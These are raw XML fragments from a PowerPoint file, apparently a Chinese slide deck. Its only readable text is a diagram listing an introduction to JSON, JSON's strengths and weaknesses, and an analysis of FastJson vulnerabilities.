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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId40"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId41"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="488" r:id="rId3"/>
    <p:sldId id="595" r:id="rId4"/>
    <p:sldId id="597" r:id="rId5"/>
    <p:sldId id="530" r:id="rId6"/>
    <p:sldId id="696" r:id="rId7"/>
    <p:sldId id="695" r:id="rId8"/>
    <p:sldId id="649" r:id="rId9"/>
    <p:sldId id="697" r:id="rId10"/>
    <p:sldId id="633" r:id="rId11"/>
    <p:sldId id="682" r:id="rId12"/>
    <p:sldId id="694" r:id="rId13"/>
    <p:sldId id="598" r:id="rId14"/>
    <p:sldId id="639" r:id="rId15"/>
    <p:sldId id="698" r:id="rId16"/>
    <p:sldId id="699" r:id="rId17"/>
    <p:sldId id="700" r:id="rId18"/>
    <p:sldId id="701" r:id="rId19"/>
    <p:sldId id="600" r:id="rId20"/>
    <p:sldId id="703" r:id="rId21"/>
    <p:sldId id="704" r:id="rId22"/>
    <p:sldId id="705" r:id="rId23"/>
    <p:sldId id="706" r:id="rId24"/>
    <p:sldId id="707" r:id="rId25"/>
    <p:sldId id="718" r:id="rId26"/>
    <p:sldId id="702" r:id="rId27"/>
    <p:sldId id="708" r:id="rId28"/>
    <p:sldId id="709" r:id="rId29"/>
    <p:sldId id="714" r:id="rId30"/>
    <p:sldId id="715" r:id="rId31"/>
    <p:sldId id="716" r:id="rId32"/>
    <p:sldId id="710" r:id="rId33"/>
    <p:sldId id="711" r:id="rId34"/>
    <p:sldId id="712" r:id="rId35"/>
    <p:sldId id="713" r:id="rId36"/>
    <p:sldId id="717" r:id="rId37"/>
    <p:sldId id="496" r:id="rId38"/>
    <p:sldId id="691" r:id="rId39"/>
  </p:sldIdLst>
  <p:sldSz cx="24384000" cy="13716000"/>
  <p:notesSz cx="6797675" cy="9926638"/>
  <p:custDataLst>
    <p:tags r:id="rId42"/>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055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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1055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="4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669">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="768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BFAEA"/>
    <a:srgbClr val="D6F4D4"/>
    <a:srgbClr val="9924FA"/>
    <a:srgbClr val="26C4EC"/>
    <a:srgbClr val="669900"/>
    <a:srgbClr val="F56C00"/>
    <a:srgbClr val="C30C3E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="E9872E"/>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9" autoAdjust="0"/>
    <p:restoredTop sz="87327" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="33" d="100"/>
          <a:sy n="33" d="100"/>
        </p:scale>
        <p:origin x="816" y="60"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="669"/>
        <p:guide pos="76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6" d="100"/>
        <a:sy n="46" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="52" d="100"/>
          <a:sy n="52" d="100"/>
        </p:scale>
        <p:origin x="29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C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}"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zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3064288F-A0BD-4599-9A83-4588D6C60EF9}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>JSON</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>的介绍</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D37818D-6815-483E-9D88-EE984D9BE862}" type="parTrans" cxnId="{A7DCB885-F376-46D6-BFBF-F9449574C8B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF611912-A12B-48C7-AF84-A56C0D6F851C}" type="sibTrans" cxnId="{A7DCB885-F376-46D6-BFBF-F9449574C8B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EC20CF2-63CE-48CE-A918-734702C38FBA}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:lumMod val="60000"/>
            <a:lumOff val="40000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>JSON</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>技术的简介和优劣</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB30709D-AA46-4C73-8ADE-DA3D18D0692E}" type="parTrans" cxnId="{D0CBD458-7396-4089-824F-609E84BE2EBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C344C652-C0E6-439B-A343-67AACF024FFC}" type="sibTrans" cxnId="{D0CBD458-7396-4089-824F-609E84BE2EBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{576C8B1C-4A04-4F85-AE42-DE3E6BECBAE4}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>FastJson</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>漏洞分析</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E700AD15-89A2-4A06-B7DB-AD59D598998F}" type="parTrans" cxnId="{3EAFEE83-354E-48D9-B10C-C96905BB0F4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFA461F9-1243-4CC3-8FC8-1D88AD114FAD}" type="sibTrans" cxnId="{3EAFEE83-354E-48D9-B10C-C96905BB0F4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25588659-A7A6-42A7-B7DD-7D10C6AF202B}" type="pres">
      <dgm:prSet presAssocID="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" type="pres">
      <dgm:prSet presAssocID="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9FBECBED-32F4-44A7-BB15-253C96DDC51F}" type="pres">
      <dgm:prSet presAssocID="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AF3182A3-1C45-4AAD-A401-50C0A1CA40DF}" type="pres">
      <dgm:prSet presAssocID="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F8EB9A14-2449-472B-B64B-6EC0D450E2FB}" type="pres">
      <dgm:prSet presAssocID="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" presName="conn" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{600F4D3E-CA27-408A-A71C-0761D0FEA707}" type="pres">
      <dgm:prSet presAssocID="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF513E28-BE3B-4431-9511-99EB9BB87F10}" type="pres">
      <dgm:prSet presAssocID="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BFA93503-3E0E-462F-B452-6621C02C79EA}" type="pres">
      <dgm:prSet presAssocID="{3064288F-A0BD-4599-9A83-4588D6C60EF9}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{549C9BD8-EEEA-433C-8A7E-2D2B205E980B}" type="pres">
      <dgm:prSet presAssocID="{3064288F-A0BD-4599-9A83-4588D6C60EF9}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDC6EB65-5604-46E1-8758-C40216518B24}" type="pres">
      <dgm:prSet presAssocID="{3064288F-A0BD-4599-9A83-4588D6C60EF9}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8E95185E-8336-432A-9543-F833582B0B43}" type="pres">
      <dgm:prSet presAssocID="{6EC20CF2-63CE-48CE-A918-734702C38FBA}" presName="text_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5C20C7E-4BD2-4456-82DA-36AB2F72396C}" type="pres">
      <dgm:prSet presAssocID="{6EC20CF2-63CE-48CE-A918-734702C38FBA}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F849A9D3-79B3-42A6-82A0-F7009478B6FE}" type="pres">
      <dgm:prSet presAssocID="{6EC20CF2-63CE-48CE-A918-734702C38FBA}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94DEAEA8-2C1C-4EF5-85E6-266D8D1DDB4A}" type="pres">
      <dgm:prSet presAssocID="{576C8B1C-4A04-4F85-AE42-DE3E6BECBAE4}" presName="text_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A891E373-8B0A-4E0A-854E-721309C95A57}" type="pres">
      <dgm:prSet presAssocID="{576C8B1C-4A04-4F85-AE42-DE3E6BECBAE4}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE831F20-BAED-4280-BD82-9567563446FB}" type="pres">
      <dgm:prSet presAssocID="{576C8B1C-4A04-4F85-AE42-DE3E6BECBAE4}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{0B83C48E-46BE-4860-BCA4-551B82A64A8F}" type="presOf" srcId="{FF611912-A12B-48C7-AF84-A56C0D6F851C}" destId="{F8EB9A14-2449-472B-B64B-6EC0D450E2FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{DF7DE657-7D41-4F00-87F5-A640E9C187E0}" type="presOf" srcId="{3064288F-A0BD-4599-9A83-4588D6C60EF9}" destId="{BFA93503-3E0E-462F-B452-6621C02C79EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{01E40FAE-81CD-49B9-9193-689DCD99C025}" type="presOf" srcId="{576C8B1C-4A04-4F85-AE42-DE3E6BECBAE4}" destId="{94DEAEA8-2C1C-4EF5-85E6-266D8D1DDB4A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{A7DCB885-F376-46D6-BFBF-F9449574C8B7}" srcId="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" destId="{3064288F-A0BD-4599-9A83-4588D6C60EF9}" srcOrd="0" destOrd="0" parTransId="{5D37818D-6815-483E-9D88-EE984D9BE862}" sibTransId="{FF611912-A12B-48C7-AF84-A56C0D6F851C}"/>
    <dgm:cxn modelId="{EE36AB24-0872-46B2-A25E-A8059568C9D6}" type="presOf" srcId="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" destId="{25588659-A7A6-42A7-B7DD-7D10C6AF202B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3EAFEE83-354E-48D9-B10C-C96905BB0F4F}" srcId="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" destId="{576C8B1C-4A04-4F85-AE42-DE3E6BECBAE4}" srcOrd="2" destOrd="0" parTransId="{E700AD15-89A2-4A06-B7DB-AD59D598998F}" sibTransId="{CFA461F9-1243-4CC3-8FC8-1D88AD114FAD}"/>
    <dgm:cxn modelId="{D0CBD458-7396-4089-824F-609E84BE2EBF}" srcId="{56C7A0D6-ACB1-4CB8-9EE9-9CB1AEADA20D}" destId="{6EC20CF2-63CE-48CE-A918-734702C38FBA}" srcOrd="1" destOrd="0" parTransId="{CB30709D-AA46-4C73-8ADE-DA3D18D0692E}" sibTransId="{C344C652-C0E6-439B-A343-67AACF024FFC}"/>
    <dgm:cxn modelId="{7A33E746-034D-4EF2-8287-3A22124BFBED}" type="presOf" srcId="{6EC20CF2-63CE-48CE-A918-734702C38FBA}" destId="{8E95185E-8336-432A-9543-F833582B0B43}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{AC31F11E-8AE9-4E99-806C-41FF8A8F5667}" type="presParOf" srcId="{25588659-A7A6-42A7-B7DD-7D10C6AF202B}" destId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{F08093E2-539A-4FE9-83B7-610489CFBB83}" type="presParOf" srcId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" destId="{9FBECBED-32F4-44A7-BB15-253C96DDC51F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{8A104715-3489-4AF5-83F2-17258B3E0007}" type="presParOf" srcId="{9FBECBED-32F4-44A7-BB15-253C96DDC51F}" destId="{AF3182A3-1C45-4AAD-A401-50C0A1CA40DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C4C00F91-C09A-415E-AF64-72884BFF7E4F}" type="presParOf" srcId="{9FBECBED-32F4-44A7-BB15-253C96DDC51F}" destId="{F8EB9A14-2449-472B-B64B-6EC0D450E2FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{50F87BD3-BE99-43E9-BA24-5286861D66B2}" type="presParOf" srcId="{9FBECBED-32F4-44A7-BB15-253C96DDC51F}" destId="{600F4D3E-CA27-408A-A71C-0761D0FEA707}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0A687708-085B-4EAB-AFC5-D3EE369BD483}" type="presParOf" srcId="{9FBECBED-32F4-44A7-BB15-253C96DDC51F}" destId="{DF513E28-BE3B-4431-9511-99EB9BB87F10}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{21D4F7DB-D0AD-45EB-879C-1C93FCE6440B}" type="presParOf" srcId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" destId="{BFA93503-3E0E-462F-B452-6621C02C79EA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{04E6E4A9-E82A-45BB-A66D-124681D3E489}" type="presParOf" srcId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" destId="{549C9BD8-EEEA-433C-8A7E-2D2B205E980B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0E834D41-A7E4-4B32-8017-57777D048DA2}" type="presParOf" srcId="{549C9BD8-EEEA-433C-8A7E-2D2B205E980B}" destId="{FDC6EB65-5604-46E1-8758-C40216518B24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0C65C2A9-D717-49BB-9C25-C2CE775EE034}" type="presParOf" srcId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" destId="{8E95185E-8336-432A-9543-F833582B0B43}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{484A519A-C1EF-441C-87D5-56747D05AB53}" type="presParOf" srcId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" destId="{B5C20C7E-4BD2-4456-82DA-36AB2F72396C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{884F406E-4BFA-47DF-A038-79D81A1E5E37}" type="presParOf" srcId="{B5C20C7E-4BD2-4456-82DA-36AB2F72396C}" destId="{F849A9D3-79B3-42A6-82A0-F7009478B6FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{041972CA-398A-49D4-94D7-171172B96F75}" type="presParOf" srcId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" destId="{94DEAEA8-2C1C-4EF5-85E6-266D8D1DDB4A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{6E59A623-D8C1-43B6-827F-627C2B0FB1ED}" type="presParOf" srcId="{D0CB2E46-E454-46E9-BA99-F412E890BC79}" destId="{A891E373-8B0A-4E0A-854E-721309C95A57}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{83DF0B51-5F22-41A0-AF3A-29534052F223}" type="presParOf" srcId="{A891E373-8B0A-4E0A-854E-721309C95A57}" destId="{FE831F20-BAED-4280-BD82-9567563446F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B9A14-2449-472B-B64B-6EC0D450E2FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-10310957" y="-1574883"/>
          <a:ext cx="12274672" cy="12274672"/>
        </a:xfrm>
        <a:prstGeom prst="blockArc">
          <a:avLst>
            <a:gd name="adj1" fmla="val 18900000"/>
            <a:gd name="adj2" fmla="val 2700000"/>
